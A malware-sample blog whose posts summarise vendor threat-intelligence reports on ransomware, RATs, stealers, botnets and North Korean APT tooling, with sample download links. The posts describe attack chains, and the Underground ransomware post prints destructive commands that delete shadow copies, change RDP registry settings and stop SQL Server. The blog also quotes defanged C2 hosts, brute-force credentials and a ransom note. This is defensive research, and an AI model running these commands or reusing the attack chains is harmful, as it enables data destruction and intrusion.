Clicky

Pages

Thursday, September 12, 2024

2024-09-12 SUPERSHELL + 2023-03-13 SHELLBOT Targeting Linux SSH servers Samples

 

2024-09-12 Ahnlab: SuperShell malware targeting Linux SSH servers

  • SuperShell is a sophisticated backdoor malware targeting Linux SSH servers, written in the Go language, which allows cross-platform functionality on Linux, Windows, and Android. Created by a Chinese-speaking developer, it operates as a reverse shell, enabling attackers to execute commands remotely on the compromised systems. The attack begins with brute force and dictionary attacks against SSH servers, using weak credentials like "root/password" and "root/123456qwerty." Once access is gained, attackers execute a series of commands to download and install SuperShell, leveraging tools like wget, curl, tftp, and FTP, with download sources often hosted on compromised servers.

  • SuperShell's obfuscation adds complexity, but it can still be identified through specific internal strings and its runtime behavior. The malware's installation process is versatile, targeting directories like /tmp, /var/run, /mnt, and /root, with commands often including clean-up actions to remove traces post-installation (rm -r *). Typically, the payload involves downloading a script or binary, which is then executed with elevated permissions using chmod +x followed by execution (./ssh1). This pattern is consistently observed across multiple commands, highlighting the malware's redundancy and persistence in ensuring successful deployment.
  • Additionally, the attackers often deploy XMRig, a Monero cryptocurrency miner, alongside SuperShell, hinting at a dual-purpose attack: maintaining persistent control over the system while generating illicit cryptocurrency. 

 2023-03-13 Ahnlab: ShellBot Malware Being Distributed to Linux SSH Servers

  • On March 13, 2023, ASEC reported that ShellBot, a Perl-based DDoS bot, is actively targeting Linux SSH servers. The malware exploits weak SSH credentials through brute-force attacks, gaining access to deploy its payload. Once installed, ShellBot connects to a Command and Control (C&C) server via the IRC protocol, enabling attackers to issue commands, steal data, and launch DDoS attacks.
  • Initial Access: Attackers scan for servers with open SSH ports (port 22) and use brute-force tools to guess weak or default credentials.
  • Installation: After gaining access, ShellBot is deployed, often achieving persistence by modifying startup scripts or cron jobs.
  • IRC Protocol: ShellBot uses the IRC protocol for C&C communication, allowing it to receive commands like executing remote tasks or launching DDoS attacks without needing a custom C&C infrastructure.
  • Customization: ShellBot is highly customizable, with variants like "LiGhT’s Modded perlbot v2" offering different capabilities and attack methods tailored by various threat actors.

Download
read more...
Posted by Mila at 9:10 PM 0 comments

2024-09-19 X-WORM RAT (Phishing) Samples

2024-09-12 0day in {REA_TEAM}: The X-Worm malware is being spread through a phishing email
by m4n0w4r


More about X-Worm: Malpedia: X-Worm Malware with wide range of capabilities ranging from RAT to ransomware.

  • Phishing Tactics: An attacker sent an email with a shortened link that, when clicked, triggered the download of a file named Itinerary.doc_.zip.
  • The downloaded .zip file contained a shortcut file (.lnk).
  • This .lnk file was used to download and run a malicious batch script (output4.bat), which employed bitsadmin to download a harmful payload, disguised as svchost.com, into the %temp% folder.
  • The svchost.com file was analyzed using tools like DiE and ExeInfo, revealing it to be part of the XWorm malware family, protected by .NET Reactor.
  • The malware's code was heavily obfuscated but was partially deobfuscated using the NETReactorSlayer tool.
  • MD5 hashing, AES encryption in ECB mode, and Base64 decoding to decrypt strings.
  • The malware’s configuration included a host (cyberdon1[.]duckdns[.]org), port (1500), and other parameters like a Telegram token and chat ID.
  • XWorm Version: The analyzed version of XWorm was 5.6.

Download
read more...
Posted by Mila at 8:33 PM 0 comments

2023-11-23 BEAVERTAIL and INVISIBLE_FERRET Lazarus Group Malware Samples

2023-11-23 Palo Alto Unit42: Hacking Employers and Seeking Employment: Two Job-Related

This is a 2023 article by Unit42 covering two cyber campaigns, "Contagious Interview" (CL-STA-0240) and "Wagemole" (CL-STA-0241), linked to the Lazarus group (North Korea). 

There is a more recent campaign VMCONNECT described by Reversing Labs here 2024-09-10 Fake recruiter coding tests target devs with malicious Python packages but I don't have samples for that one.

 These campaigns target job-seeking activities to deploy malware and conduct espionage. 

Contagious Interview (CL-STA-0240):

  • The campaign targets software developers by posing as employers and convincing them to download malicious NPM packages during fake job interviews. The malware, BeaverTail and InvisibleFerret, is cross-platform, running on Windows, Linux, and macOS.

  • BeaverTail: A JavaScript-based malware that steals cryptocurrency wallet information and loads the second-stage payload, InvisibleFerret.

    InvisibleFerret: A Python-based backdoor with capabilities including fingerprinting, remote control, keylogging, and browser credential theft. It communicates with a C2 server using JSON-formatted messages and supports commands for data exfiltration and additional malware deployment.

  • The threat actors use GitHub to host malicious NPM packages, creating accounts with minimal activity to avoid detection.

Wagemole (CL-STA-0241):

  • Wagemole involves North Korean actors using fake identities to apply for remote IT jobs, likely to funnel wages to North Korea's weapons programs and potentially conduct espionage.

  • Exposed Infrastructure: Researchers found resumes, interview scripts, and other fraudulent materials on GitHub. These documents impersonate IT professionals and aim to gain unauthorized employment at US companies.

Download
read more...
Posted by Mila at 2:11 PM 0 comments

Tuesday, September 10, 2024

2024-09-10 KIMSUKY (North Korean APT) Sample (Sakai @sakaijjan - Terms and Conditions.msc)


 2024-09-10 Sakai @sakaijjang 김수키(Kimsuky) 에서 만든 악성코드-Terms and conditions(이용 약관).msc(2024.9.6)   - Kimsuky (North Korea) - Terms and Conditions.msc

by https://x.com/sakaijjang?lang=en 

Article translation in English 

More about Kimsuky: 2020-10-27 CISA North Korean Advanced Persistent Threat Focus

  •  The malware is delivered as a file named "Terms and conditions.msc," containing embedded PowerShell commands.
  • The PowerShell script is executed in a hidden window (-WindowStyle Hidden), preventing user awareness.
  • The script uses Invoke-Expression (iex) to execute code and Invoke-WebRequest (iwr) to download a malicious script from hxxps://0x0(.)st/Xyl7(.)txt.
  • The downloaded data, encoded in hexadecimal, is decoded into a byte array.
  • The decoded data is initially saved as an MP3 file (e.g., vBqz.mp3) in the system’s public documents folder.
  • The MP3 file is then renamed to an executable file (e.g., vBqz.exe), disguising the payload as a media file.
  • The executable is run using conhost.exe in the background with the -NoNewWindow option, ensuring it remains hidden.
  • File Camouflage: The use of the MP3 extension initially disguises the executable file.
  • Stealthy Execution: Utilizing system utilities like conhost.exe and executing commands in hidden windows help evade user detection and security software.
  • Command-and-Control (C2) Infrastructure: The malware’s reliance on a public site for payload distribution suggests a flexible and easily reconfigurable C2 mechanism.
  • Hexadecimal Encoding: The use of encoded data indicates potential obfuscation techniques; decoding this data can reveal more about the malware.
  • Potential Variants: Different versions of this malware may exist, with variations in the payload or C2 URLs. Monitoring and updating detection rules, such as YARA, would be beneficial.

Download
read more...
Posted by Mila at 8:59 PM 0 comments

2024-09-03 LUXY Ransomware / Stealer Sample

 2024-09-03 K7 Security Labs: Luxy: A Stealer and a Ransomware in one




  • The sample is a .NET 32-bit executable, enforcing single-instance execution via a mutex and ensuring network connectivity before proceeding. It also implements anti-VM checks using System UUIDs, process names, and other system identifiers to evade sandbox environments.
  • Browser Data Extraction: Utilizes methods like GETENCRYPTIONKEY to extract and decrypt stored passwords and cookies from various browsers.
  • Cryptocurrency Wallet Theft: Targets wallets such as Zcash, Ethereum, and others, copying wallet files to a text file for exfiltration.
  • Session File Theft: Extracts Minecraft session files, logging them in a source.txt file, potentially compromising user authentication.
  • Roblox Cookie Theft: Steals cookies from the registry and browsers using PowerShell commands.
  • File Encryption: Deploys AES256 encryption on all files in the malware execution path, renaming files post-encryption. The encryption method uses a 128-bit key and IV, padding the plaintext to meet AES block size requirements.
  • Ransom Note: After encryption, a ransom note is dropped, informing the victim of the encryption and providing instructions to obtain the decryption key.

The Ransom note reads: 

ATTENTION!

Don't worry, you can return all your files!

All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.

The only method of recovering files is to purchase decrypt tool and unique key for you.

This software will decrypt all your encrypted files.

Price of private key and decrypt software is $980.

Discount 50% available if you contact us first 72 hours, that's price for you is $490.

Please note that you'll never restore your data without payment.

To get this software and key you need join our server discord:

discord.gg/

Personal ID:

Download
read more...
Posted by Mila at 8:14 PM 0 comments

Saturday, September 7, 2024

2024-09-05 SHRINKLOCKER (Bitlocker) Ransomware Samples

2024-09-05 Splunk: ShrinkLocker Malware: Abusing BitLocker to Lock Your Data

ShrinkLocker is a newly discovered ransomware strain that exploits BitLocker, a legitimate Windows feature, to encrypt data by locking users out of their systems. Unlike traditional ransomware, ShrinkLocker leverages BitLocker's secure boot partition to make decryption extremely challenging. The malware initiates its attack by identifying the operating system and determining whether it’s a suitable target. It modifies key system registry settings, particularly those related to Remote Desktop Protocol (RDP) and Trusted Platform Module (TPM), to suit its objectives. After disabling BitLocker key protectors, ShrinkLocker shrinks non-boot partitions by 100MB, formats these partitions, and reconfigures boot files to destabilize the system, potentially rendering it irreparable. The malware also exfiltrates data to a command-and-control server and attempts to erase traces of its activity by deleting logs, firewall rules, and scheduled tasks.



read more...
Posted by Mila at 5:39 PM 0 comments

2024-08-30 Cicada ESXi Ransomware Sample

 



Cicada3301, a ransomware group first detected in June 2024, appears to be either a rebranded or derivative version of the ALPHV ransomware group, employing a ransomware-as-a-service (RaaS) model. The ransomware, written in Rust, targets both Windows and Linux/ESXi environments, utilizing ChaCha20 for encryption. Technical analysis reveals several key similarities with ALPHV: both use nearly identical command structures for shutting down VMs and removing snapshots, and share a similar file-naming convention. The ransomware's binary is an ELF file, with its Rust origin confirmed through string references and investigation of the .comment section.

Key parameters include sleep, which delays the ransomware's execution, and ui, which displays the encryption progress on the screen. The key parameter is crucial for decryption; if it's not provided or incorrect, the ransomware will stop running. The main function, linux_enc, starts the encryption process by generating a random key using OsRng. Files larger than 100 MB are encrypted in parts, while smaller files are encrypted entirely using ChaCha20. The ChaCha20 key is then secured with an RSA public key and added, along with a specific file extension, to the end of the encrypted file.

Initial access appears to be facilitated by the Brutus botnet, with threat actors using stolen or brute-forced credentials to gain entry via ScreenConnect. The IP address associated with this attack is tied to the Brutus botnet, raising the possibility of a direct connection between the botnet operators and Cicada3301. The ransomware also features a decryption check routine, where an encoded and encrypted ransomware note stored within the binary is decrypted using the provided key, validating the correct decryption.


Download


Download. (Email me if you need the password scheme)



File Information

63e0d4e861048f581c9e5c64b28a053eb0023d58eebf2b943868d5f68a67a8b7 esxi

The article didn't include any hashes, only the YARA rule. While this sample doesn't trigger a match with the rule, I believe it's the same malware
Posted by Mila at 5:31 PM 0 comments Tags:

Tuesday, September 3, 2024

2024-09-02 ABYSS Ransomware Windows and Linux Samples




Abyss Ransomware, first identified in 2023, is a sophisticated ransomware strain targeting both Windows and Linux systems, with a specific focus on VMware ESXi environments. It employs advanced encryption techniques, multi-extortion tactics, and strategic network infiltration to disrupt operations across various sectors, including finance, healthcare, and technology.

Key Characteristics:

Target Platforms: Windows, Linux (particularly VMware ESXi)
Encryption: Utilizes the Salsa20 encryption algorithm; appends .abyss or .crypt extensions.
Initial Access Vectors: Phishing emails, weak SSH configurations, and exploiting known vulnerabilities in exposed servers.
Multi-Extortion Tactics: Encrypts files and exfiltrates data, threatening public exposure on a TOR-based leak site if ransom demands are not met.
Windows Variant:

Service Termination: Disables critical services (e.g., MSSQL, Exchange) to ensure encryption success.
Persistence: Alters boot configuration to disable recovery options.
File Encryption: Employs Salsa20; ransom note WhatHappened.txt is dropped in each directory.
Obfuscation: Written in C++, using techniques to evade detection and hinder forensic analysis.
Linux Variant:

VMware ESXi Targeting: Leverages esxcli to manage and shut down virtual machines for encryption.
Selective Encryption: Avoids critical system directories to maintain partial system functionality.
Persistence: Establishes daemon processes to ensure the ransomware remains active post-reboot.


read more...
Posted by Mila at 1:32 PM 0 comments

Monday, September 2, 2024

2022-2024 North Korea Citrine Sleet /Lazarus FUDMODULE ( BYOVD ) Rootkit Samples


2024-08-30 Microsoft: North Korean threat actor Citrine Sleet exploiting Chromium zero-day 

2024-03-01 Lazarus group operations — A deep dive into FudModule Rootkit by Lucas Mancilha

read more...
Posted by Mila at 4:43 PM 0 comments

2024-08-28 CORONA MIRAI Botnet Spreads via Zero-Day (CVE-2024-7029) - command injection vulnerability found in the brightness function of AVTECH closed-circuit television (CCTV) Samples






Akamai's Security Intelligence and Response Team (SIRT) has identified a new botnet campaign exploiting multiple vulnerabilities, including a zero-day vulnerability, CVE-2024-7029, discovered by Aline Eliovich. This command injection vulnerability exists in the brightness function of AVTECH IP camera devices, allowing for remote code execution (RCE). The botnet spreads a Mirai variant with strings referencing the COVID-19 virus, leveraging this vulnerability to infect systems.

  • CVE-2024-7029: This vulnerability affects AVTECH IP camera models with firmware versions up to AVM1203 FullImg-1023-1007-1011-1009. The flaw allows attackers to inject commands through the "brightness" parameter in the device's web interface, leading to remote code execution.
  • Exploitation: The botnet campaign not only exploits CVE-2024-7029 but also targets older, unpatched vulnerabilities, such as a Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. These vulnerabilities, though older, remain effective due to their widespread use in unpatched systems.
  • Spread of Mirai Variant: The attack chain involves exploiting the identified vulnerabilities to download and execute a variant of the Mirai botnet. This variant, known as Corona Mirai, connects to command-and-control servers and spreads across networks, particularly through Telnet on ports 23, 2323, and 37215.
  • Affected Devices: The vulnerability primarily impacts AVTECH IP camera models, specifically those running the AVM1203 firmware versions mentioned above. Despite these models being discontinued, they are still in use in critical infrastructure, including transportation authorities

Affected Models:

  • AVTECH IP Cameras: Specifically models running up to AVM1203 firmware versions FullImg-1023-1007-1011-1009.


Download

read more...
Posted by Mila at 1:44 PM 0 comments

2024-08-29 ASYNCRAT Samples



2024-08-29 Esentire: Exploring AsyncRAT and Infostealer Plugin Delivery Through Phishing Emails

eSentire's Threat Response Unit (TRU) discovered an AsyncRAT infection that was delivered through a Windows Script File (.wsf) via email. The malicious .wsf file, named “SummaryForm_,” downloaded a VBScript from a remote server, which then fetched a fake image file. 
This file was actually a ZIP archive that, once extracted, ran additional scripts to establish persistence on the system. The scripts created a scheduled task to execute the AsyncRAT payload repeatedly, making it difficult to detect and remove. The payload was injected into the RegAsm.exe process using a DLL to further evade detection.



Additionally, this version of AsyncRAT included an infostealer plugin designed to exfiltrate data from popular web browsers like Chrome and Firefox, as well as cryptocurrency wallet extensions such as MetaMask and Coinbase. The attack highlights the use of multiple stages and obfuscation techniques to maintain persistence and steal sensitive information from the infected system.



Download
read more...
Posted by Mila at 1:27 PM 0 comments

2024-08-29 UNDERGROUND Ransomware Samples





The Underground ransomware is likely spread by the RomCom group (also known as Storm-0978). The group exploits the Microsoft Office and Windows HTML RCE vulnerability (CVE-2023-36884). Other methods, such as phishing emails and access via Initial Access Brokers (IABs), may also be used.

    • Shadow Copies Deletion: It removes all shadow copies to prevent file recovery:
    • bash
    • Copy code
    • vssadmin.exe delete shadows /all /quiet
    • RDP Session Limits: Sets a 14-day limit on Remote Desktop sessions to maintain persistence:
    • bash
    • Copy code
    • reg.exe add HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services / v MaxDisconnectionTime / t REG_DWORD / d 1209600000 / f
    • SQL Server Service Stop: Halts the MS SQL Server service to disrupt operations:
    • bash
    • Copy code
    • net.exe stop MSSQLSERVER /f /m
    • Ransom Note Deployment: Drops a ransom note named “!!readme!!!.txt” in directories containing encrypted files.
  • File Encryption: The ransomware encrypts files without altering their extensions, making it harder to visually identify encrypted files. It avoids encrypting critical system files (e.g., .sys, .exe, .dll) to maintain system functionality.
  • Log and File Deletion: It creates and runs a script (temp.cmd) to delete the original ransomware file and clear Windows Event logs, complicating forensic analysis.
  • Data Leak Site: The ransomware group maintains a site where they post stolen data from their victims, spanning industries such as construction, pharmaceuticals, and manufacturing. As of July 2024, they have listed 16 victims.
  • Telegram Channel: The group also uses a Telegram channel to distribute stolen data, with links to files hosted on Mega, a cloud storage service.


Download
read more...
Posted by Mila at 1:05 PM 0 comments Tags:

2024-08-23 ANGRY STEALER (Rage stealer variant) Telegram rat . Samples




2024-08-23 Cyfirma. A Comprehensive Analysis of Angry Stealer : Rage Stealer in a New Disguise (Telegram rat).

CYFIRMA analyzed malware known as "Angry Stealer", which is heavily advertised on platforms like Telegram,   a repackaged version of the previously identified "Rage Stealer"
  • The dropper is a 32-bit Win32 executable written in .NET, which acts as the initial stage of the attack. Upon execution, it deploys two key payloads: "Stepasha.exe" and "MotherRussia.exe,
  • Stepasha.exe - The Info-Stealer:
    • Once deployed, "Stepasha.exe" begins an extensive data collection process. It targets sensitive information stored on the infected system, including browser data (passwords, cookies, autofill data), cryptocurrency wallets, VPN credentials, and system information.
    • The collected data is then packaged into a ZIP file and exfiltrated to a remote Telegram channel. This process leverages hardcoded credentials and bypasses SSL validation, ensuring the data reaches the attacker without interruption.
    • The malware incorporates techniques to avoid detection, such as tampering with file timestamps and ensuring only one instance runs at a time.
  • MotherRussia.exe - The Builder Tool:
    • This secondary payload acts as a builder, allowing the creation of additional malicious executables. The user provides specific inputs, such as bot tokens and chat IDs, which are then embedded into the generated executable.
    • The tool is likely designed for tasks related to remote desktop operations or bot interactions, making it easier for attackers to automate and scale their malicious activities.
  • Angry Stealer" is a direct descendant of "Rage Stealer," sharing the same codebase and functionality. This rebranding approach allows cybercriminals to market the same malware under different names, reaching new buyers and avoiding detection by reusing proven tactics.
  • The dropper was compiled in a .NET environment, likely within an isolated setup like Windows Defender Application Guard, suggesting that the developers took precautions to avoid detection during development.


Download

read more...
Posted by Mila at 12:54 PM 0 comments
Subscribe to: Posts (Atom)
Home